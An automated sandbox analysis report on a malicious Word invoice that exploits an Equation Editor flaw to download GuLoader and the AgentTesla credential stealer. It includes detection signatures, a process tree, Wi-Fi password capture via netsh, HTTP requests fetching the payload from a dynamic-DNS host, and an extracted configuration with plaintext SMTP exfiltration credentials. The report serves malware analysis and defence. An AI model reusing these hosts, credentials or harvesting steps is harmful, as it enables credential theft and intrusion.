Loading ...

Play interactive tourEdit tour

Analysis Report Factura.docx

Overview

General Information

Sample Name:Factura.docx
MD5:42dbae807d20dbacc52b4530f01fec9a
SHA1:264d3851de194ca25119fa2ba788d1d1f81d1fad
SHA256:b18f96dd5b69bc677dadaadf2c1b6587412ba42a10bc6217367a12c6df5e087d

Most interesting Screenshot:

Detection

AgentTesla GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains an external reference to another document
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: RegAsm connects to smtp port
Yara detected AgentTesla
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Hides threads from debuggers
Modifies the context of a thread in another process (thread injection)
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Potential document exploit detected (performs DNS queries with low reputation score)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses dynamic DNS services
Uses netsh to modify the Windows network and firewall settings
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7
  • WINWORD.EXE (PID: 3816 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
  • EQNEDT32.EXE (PID: 2120 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 484 cmdline: 'C:\Users\user\AppData\Roaming\vbc.exe' MD5: 3EF86B394F40F47FE71A8F50DC6C1C84)
      • RegAsm.exe (PID: 2316 cmdline: 'C:\Users\user\AppData\Roaming\vbc.exe' MD5: 246BB0F8D68A463FD17C235DEB5491C0)
        • netsh.exe (PID: 2368 cmdline: 'netsh' wlan show profile MD5: 784A50A6A09C25F011C3143DDD68E729)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "4Jry3HE", "URL: ": "http://eYifB0NwlB.net", "To: ": "sergiofile12@gmail.com", "ByHost: ": "mail.ovidiogarcia.com:587", "Password: ": "I2sy8obJ7f8T0", "From: ": "alberto@ovidiogarcia.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.2606953485.00070000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    0000000A.00000002.2611648109.1F4B0000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      Process Memory Space: RegAsm.exe PID: 2316JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        Process Memory Space: RegAsm.exe PID: 2316JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
          Process Memory Space: RegAsm.exe PID: 2316JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

            Sigma Overview


            System Summary:

            barindex
            Sigma detected: Capture Wi-Fi passwordShow sources
            Source: Process startedAuthor: Joe Security: Data: Command: 'netsh' wlan show profile, CommandLine: 'netsh' wlan show profile, CommandLine|base64offset|contains: V, Image: C:\Windows\System32\netsh.exe, NewProcessName: C:\Windows\System32\netsh.exe, OriginalFileName: C:\Windows\System32\netsh.exe, ParentCommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , ParentImage: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, ParentProcessId: 2316, ProcessCommandLine: 'netsh' wlan show profile, ProcessId: 2368
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\vbc.exe, NewProcessName: C:\Users\user\AppData\Roaming\vbc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\vbc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2120, ProcessCommandLine: 'C:\Users\user\AppData\Roaming\vbc.exe' , ProcessId: 484
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE, ProcessId: 2120, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exe
            Sigma detected: RegAsm connects to smtp portShow sources
            Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 185.92.245.159, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe, Initiated: true, ProcessId: 2316, Protocol: tcp, SourceIp: 192.168.2.2, SourceIsIpv6: false, SourcePort: 49169

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: RegAsm.exe.2316.10.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "4Jry3HE", "URL: ": "http://eYifB0NwlB.net", "To: ": "sergiofile12@gmail.com", "ByHost: ": "mail.ovidiogarcia.com:587", "Password: ": "I2sy8obJ7f8T0", "From: ": "alberto@ovidiogarcia.com"}
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PZODCLB6\regasm[1].exeVirustotal: Detection: 20%Perma Link
            Source: C:\Users\user\AppData\Roaming\vbc.exeVirustotal: Detection: 20%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: Factura.docxVirustotal: Detection: 36%Perma Link
            Source: Factura.docxMetadefender: Detection: 15%Perma Link
            Source: Factura.docxReversingLabs: Detection: 29%

            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E2932E2 CryptFindOIDInfo,10_2_1E2932E2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_1E2932A9 CryptFindOIDInfo,10_2_1E2932A9

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\vbc.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

            Software Vulnerabilities:

            barindex
            Potential document exploit detected (performs DNS queries with low reputation score)Show sources
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEDNS query: name: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 4x nop then cld 10_2_00072636
            Source: global trafficDNS query: name: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.2:49167 -> 216.58.207.33:443
            Source: global trafficTCP traffic: 192.168.2.2:49159 -> 103.99.1.165:80

            Networking:

            barindex
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.2:49169 -> 185.92.245.159:587
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 09 Jun 2020 19:42:54 GMTServer: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38Last-Modified: Tue, 09 Jun 2020 11:36:44 GMTETag: "12000-5a7a5244dcc22"Accept-Ranges: bytesContent-Length: 73728Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 50 f6 82 93 31 98 d1 93 31 98 d1 93 31 98 d1 10 2d 96 d1 92 31 98 d1 dc 13 91 d1 98 31 98 d1 a5 17 95 d1 92 31 98 d1 52 69 63 68 93 31 98 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 19 d8 fc 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 00 00 00 30 00 00 00 00 00 00 08 14 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 02 00 09 00 04 00 00 00 00 00 00 00 00 20 01 00 00 10 00 00 88 41 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 e1 00 00 28 00 00 00 00 00 01 00 18 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 02 00 00 20 00 00 00 00 10 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 d7 00 00 00 10 00 00 00 e0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ec 0d 00 00 00 f0 00 00 00 10 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 18 15 00 00 00 00 01 00 00 20 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Source: Joe Sandbox ViewIP Address: 216.58.207.33 216.58.207.33
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewASN Name: unknown unknown
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficTCP traffic: 192.168.2.2:49169 -> 185.92.245.159:587
            Source: global trafficHTTP traffic detected: GET /document/invoice_111334.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)Accept-Encoding: gzip, deflateHost: mkpksb2stdywhatsapphappentomaninliveso.duckdns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /mkpk2doc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mkpksb2stdywhatsapphappentomaninliveso.duckdns.orgConnection: Keep-Alive
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 10_2_0097A09A recv,10_2_0097A09A
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
            Source: global trafficHTTP traffic detected: GET /document/invoice_111334.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)Accept-Encoding: gzip, deflateHost: mkpksb2stdywhatsapphappentomaninliveso.duckdns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /mkpk2doc/regasm.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mkpksb2stdywhatsapphappentomaninliveso.duckdns.orgConnection: Keep-Alive
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: mkpksb2stdywhatsapphappentomaninliveso.duckdns.org
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230976244.1EA68000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
            Source: RegAsm.exe, 0000000A.00000003.1231194838.21E68000.00000004.00000001.sdmpString found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
            Source: RegAsm.exe, 0000000A.00000002.2612025443.1F6A3000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
            Source: RegAsm.exe, 0000000A.00000002.2612025443.1F6A3000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: RegAsm.exe, 0000000A.00000002.2612025443.1F6A3000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
            Source: RegAsm.exe, 0000000A.00000003.1231217618.21E89000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231217618.21E89000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231217618.21E89000.00000004.00000001.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmp, RegAsm.exe, 0000000A.00000002.2610802818.1E970000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.10.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: RegAsm.exe, 0000000A.00000002.2610865527.1E9AF000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enWUv
            Source: RegAsm.exe, 0000000A.00000002.2611648109.1F4B0000.00000004.00000001.sdmpString found in binary or memory: http://eYifB0NwlB.net
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230994356.21EC6000.00000004.00000001.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
            Source: document on mkpksb2stdywhatsapphappentomaninliveso.duckdns.org.url.0.drString found in binary or memory: http://mkpksb2stdywhatsapphappentomaninliveso.duckdns.org/document/
            Source: invoice_111334.doc.url.0.drString found in binary or memory: http://mkpksb2stdywhatsapphappentomaninliveso.duckdns.org/document/invoice_111334.doc
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o10
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://repository.swisssign.com/0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.a-cert.at0E
            Source: RegAsm.exe, 0000000A.00000003.1231204370.21E83000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
            Source: RegAsm.exe, 0000000A.00000003.1231204370.21E83000.00000004.00000001.sdmpString found in binary or memory: http://www.acabogacia.org0
            Source: RegAsm.exe, 0000000A.00000003.1231204370.21E83000.00000004.00000001.sdmpString found in binary or memory: http://www.ancert.com/cps0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
            Source: RegAsm.exe, 0000000A.00000003.1231057571.21E6B000.00000004.00000001.sdmpString found in binary or memory: http://www.certicamara.com0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231034488.21EA6000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.certifikat.dk/repository0
            Source: RegAsm.exe, 0000000A.00000003.1231057571.21E6B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
            Source: RegAsm.exe, 0000000A.00000002.2611065418.1EA28000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231057571.21E6B000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
            Source: RegAsm.exe, 0000000A.00000002.2611065418.1EA28000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
            Source: RegAsm.exe, 0000000A.00000002.2610865527.1E9AF000.00000004.00000001.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.chambersign.org1
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.crc.bg0
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: RegAsm.exe, 0000000A.00000003.1230524806.00769000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.disig.sk/ca0f
            Source: RegAsm.exe, 0000000A.00000003.1230886581.21E74000.00000004.00000001.sdmpString found in binary or memory: http://www.dnie.es/dpc0
            Source: RegAsm.exe, 0000000A.00000003.1231010403.21E8C000.00000004.00000001.sdmpString found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
            Source: RegAsm.exe, 0000000A.00000003.1231204370.21E83000.00000004.00000001.sdmpString found in binary or memory: http://www.e-me.lv/repository0
